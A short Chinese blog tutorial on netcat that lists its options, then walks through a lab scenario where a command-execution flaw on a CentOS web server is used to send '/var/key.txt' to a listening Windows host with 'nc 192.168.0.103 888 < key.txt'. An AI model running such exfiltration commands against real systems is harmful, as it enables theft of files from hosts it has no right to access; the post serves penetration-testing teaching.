NC利用

目录

  1. 基本命令
  2. 利用场景

 基本命令

NC就是netcat,渗透测试中被称为瑞士军刀,它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能;

语法:NC  [参数]

-g<网关>:设置路由器跃程通信网关,最多设置8个;

-G<指向器数目>:设置来源路由指向器,其数值为4的倍数;

-h:在线帮助;

-i<延迟秒数>:设置时间间隔,以便传送信息及扫描通信端口;

-l:使用监听模式,监控传入的资料;

-n:直接使用ip地址,而不通过域名服务器;

-o<输出文件>:指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;

-p<通信端口>:设置本地主机使用的通信端口;

-r:指定源端口和目的端口都进行随机的选择;

-s<来源位址>:设置本地主机送出数据包的IP地址;

-u:使用UDP传输协议;

-v:显示指令执行过程;

-w<超时秒数>:设置等待连线的时间;

-z:使用0输入/输出模式,只在扫描通信端口时使用。


 利用场景

终端A(centos)192.168.242.131

终端B(windows)192.168.0.103

场景:如果A上部署了web服务,存在命令执行的情况,那么可以使用NC监听A上的内容。

例如A终端/var目录下有一个key.txt

 

a.windows的B终端监听端口888,使用nc.exe -lvvvp 888,完成监听

 

b.centos终端传输文件内容到B终端,使用nc 192.168.0.103 888 < key.txt

 

c.这个时候可以在B中打印key.txt的文件内容

posted @ 2020-01-09 14:23  请叫我阿毛  阅读(460)  评论(0编辑  收藏  举报